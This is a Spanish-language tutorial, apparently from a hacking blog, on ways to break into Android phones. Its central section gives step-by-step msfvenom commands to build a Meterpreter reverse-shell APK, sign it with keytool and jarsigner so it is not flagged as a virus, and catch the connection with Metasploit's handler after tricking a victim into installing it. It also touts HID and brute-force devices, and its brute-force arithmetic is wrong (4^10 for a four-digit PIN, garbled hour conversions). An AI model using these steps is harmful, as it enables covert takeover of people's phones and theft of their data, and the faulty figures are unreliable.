Los métodos utilizados por los atacantes para explotar los teléfonos Android están aumentando. La gente está ocupada encontrando nuevas vulnerabilidades para explotar. A continuación se muestran algunas formas de hackear teléfonos Android:
El ataque HID es un escenario en el que un atacante toma una plataforma de desarrollo integrada programable, como un paquete de software asociado como SET (Social Engineering Toolkit), Metasploit, etc., o usa otros teléfonos y USB que están programados para ser un RubberDucky y ejecutar un ataque.
En tal ataque, el hacker instala una puerta trasera y, al usarla, descarga completamente la información del objetivo.
Usando la información, puede piratear la cuenta bancaria de la persona o incluso venderla en la web oscura.
Puedes ver cómo se lleva a cabo un ataque oculto desde el
android infosec
canalUn ataque de fuerza bruta utiliza el método de prueba y error para adivinar la contraseña correcta del teléfono.
Algunos puntos importantes a considerar para realizar un ataque de este tipo:
El tiempo de espera:
After 5 Wrong pin 's - 30 sec delay After 1 Wrong pin' s - 30 sec delay After 41 Wrong pin 's - 30 sec delay
El número de contraseñas:
El número total de combinaciones posibles para un candado numérico de 4 dígitos puede comenzar desde 4 ceros hasta 4 nueves, lo que significa 0000-9999, por lo que tenemos aproximadamente:
4 ^ 10 amount of password or
1048576 passwords in total
Tiempo consumido:
Veamos algunas posibilidades para nuestra comprensión:
Posibilidad #1: 5 contraseñas incorrectas, un retraso de 30 segundos. Necesitamos averiguar cuántas veces obtenemos el retraso en primer lugar y encontrar el tiempo total consumido.
total delay 1048576 / 5 = 209715.2 times total time 209715.2 * 30 = 6291456 sec or
1747.6266 hours
Posibilidad #2 : 41 contraseñas incorrectas, demora 30 seg.
total delays 1048576 / 41 = 25 , 575.0243 delays total time consumed 25575.0243 * 30 = 7 , 67 , 250.729 sec or
767250.729 / 60 = 12 , 787.5121 min
or
12 , 787.51215 hours
Puede ver que es casi imposible encontrar la contraseña del teléfono de la persona por fuerza bruta. Estarás muerto cuando encuentres la contraseña del teléfono 😣.
Las cargas útiles son scripts simples que ayudan a un pirata informático a piratear un sistema. Entonces, si solo engaño a la persona para que autorice e instale el archivo .apk, lo que abre una puerta trasera para que Meterpreter escuche una conexión para controlar el sistema.
meterpreter reverse tcp payload creation command:
msfvenom –p android/meterpreter/reverse_tcp LHOST =Localhost IP LPORT =LocalPort R > android_shell.apk
La carga útil es -p, LHOST Localhost IP para recibir una conexión posterior (verifique la suya con el comando if-config ), LPORT Puerto localhost en el que la conexión escucha a la víctima (lo configuramos en 4444), formato R Raw (seleccionamos .apk ).
Necesitamos proporcionar un certificado al archivo .apk para darle una identidad. Necesitamos firmar un certificado para un archivo .apk para reconocerlo como una aplicación. Sin esto, el archivo .apk se reconocerá como un virus.
Para asignar un certificado, debe seguir estos pasos
Instalar:
Firme el archivo .apk localmente:
keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000
Keytool haciendo Keystore:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore android_shell.apk hacked
Firmando un archivo .apk con JARsigner:
jarsigner -verify -verbose -certs android_shell.apk
Instale y use Zipalign:
sudo apt-get install zipalign or sudo apt install zipalign
zipalign -v 4 android_shell.apk singed_jar.apk
Ahora ejecute el comando para eso está en la consola de Metasploit:
use exploit/multi/handler
Y configure los diversos parámetros en Metasploit como lhost, lport, etc. Ahora debe ejecutar el comando después de configurar el host y el tipo de puerto:
type: run (and press enter)
Después de ejecutar este código, recibirá una conexión con el sistema de destino. Con esto, puede acceder a todo el sistema y obtener acceso completo.
Un teléfono flasheado es un dispositivo en el que se ha flasheado una ROM/sistema operativo diferente sobre el sistema que viene con el teléfono. A menudo, los teléfonos pueden mostrarse desbloqueados cuando, en realidad, siguen siendo teléfonos con la marca del operador que no serán compatibles con nuestro servicio.
Para cada teléfono, existen diferentes métodos para el restablecimiento de fábrica, el más común es hacerlo a través de los botones de volumen y el botón de encendido. Por ejemplo, tengo un viejo teléfono oppo para el cual la combinación de restablecimiento de fábrica es el botón de volumen y el botón de encendido y durante 5 segundos y el teléfono parpadea.
Bypass es un método comúnmente utilizado por las fuerzas del orden como la CIA, el FBI y en India, IB y RAW utilizan un dispositivo especial como se muestra en la imagen.
En este tipo de ataque, depende principalmente de que el atacante use IP_BOX, que funciona principalmente en la fuerza bruta del objetivo. Esto es utilizado principalmente por las fuerzas del orden público para acceder a los teléfonos de los ciberdelincuentes terroristas y los teléfonos de otros delincuentes.
Puede usar otra herramienta conocida como BashBunny de hak5. Esta es una mini computadora desde la cual puede realizar un ataque de fuerza bruta de inicio de sesión. A diferencia de las otras opciones anteriores, esta es una bestia seria en su trabajo. En cuestión de horas, puede descifrar las contraseñas más difíciles con facilidad.
Nota
Este tutorial es solo para fines educativos. No intentes esto y te metas en problemas.